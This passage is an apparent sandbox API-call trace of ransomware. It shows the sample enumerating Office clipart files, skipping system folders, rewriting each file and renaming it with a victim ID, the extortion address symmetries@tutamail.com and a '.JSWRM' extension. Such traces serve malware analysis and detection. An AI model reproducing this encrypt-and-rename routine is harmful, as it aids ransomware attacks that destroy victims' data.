"c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0097.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.017] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1708, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00941_.WMF", cAlternateFileName="")) returned 1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2=".") returned 1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="..") returned 1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="...") returned 1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="windows") returned -1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="recovery") returned 1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="perflogs") returned 1 [0097.017] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="documents and settings") returned 1 [0097.018] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.018] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="system volume information") returned -1 [0097.018] lstrcmpiW (lpString1="SO00941_.WMF", lpString2="msocache") returned 1 [0097.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0097.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00941_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00941_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00941_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0097.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0097.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00941_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00941_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00941_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0097.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0097.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0097.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0097.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.019] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5896) returned 1 [0097.019] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1700) returned 0x205850 [0097.019] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1700, lpOverlapped=0x0) returned 1 [0097.021] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.021] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1700, lpOverlapped=0x0) returned 1 [0097.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.021] CloseHandle (hObject=0x314) returned 1 [0097.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0097.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0097.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0097.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0097.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0097.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0097.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.022] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00941_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00941_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0097.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0097.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0097.023] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00942_.WMF", cAlternateFileName="")) returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2=".") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="..") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="...") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="windows") returned -1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="recovery") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="perflogs") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="documents and settings") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="system volume information") returned -1 [0097.023] lstrcmpiW (lpString1="SO00942_.WMF", lpString2="msocache") returned 1 [0097.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0097.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00942_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00942_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00942_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0097.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00942_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00942_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00942_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0097.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0097.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.024] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4708) returned 1 [0097.024] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1260) returned 0x205850 [0097.024] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1260, lpOverlapped=0x0) returned 1 [0097.025] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.026] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1260, lpOverlapped=0x0) returned 1 [0097.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.026] CloseHandle (hObject=0x314) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0097.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0097.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0097.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0097.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0097.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00942_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00942_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0097.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0097.027] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d84, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00943_.WMF", cAlternateFileName="")) returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2=".") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="..") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="...") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="windows") returned -1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="recovery") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="perflogs") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="documents and settings") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="system volume information") returned -1 [0097.027] lstrcmpiW (lpString1="SO00943_.WMF", lpString2="msocache") returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0097.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00943_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00943_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00943_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0097.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0097.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00943_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00943_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00943_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0097.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0097.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0097.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.029] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7556) returned 1 [0097.029] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d80) returned 0x205850 [0097.029] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d80, lpOverlapped=0x0) returned 1 [0097.030] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.031] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d80, lpOverlapped=0x0) returned 1 [0097.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.031] CloseHandle (hObject=0x314) returned 1 [0097.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0097.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0097.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0097.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0097.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0097.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0097.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.031] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00943_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00943_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0097.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0097.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0097.032] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae1a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01044_.WMF", cAlternateFileName="")) returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2=".") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="..") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="...") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="windows") returned -1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="recovery") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="perflogs") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="documents and settings") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="system volume information") returned -1 [0097.032] lstrcmpiW (lpString1="SO01044_.WMF", lpString2="msocache") returned 1 [0097.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0097.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 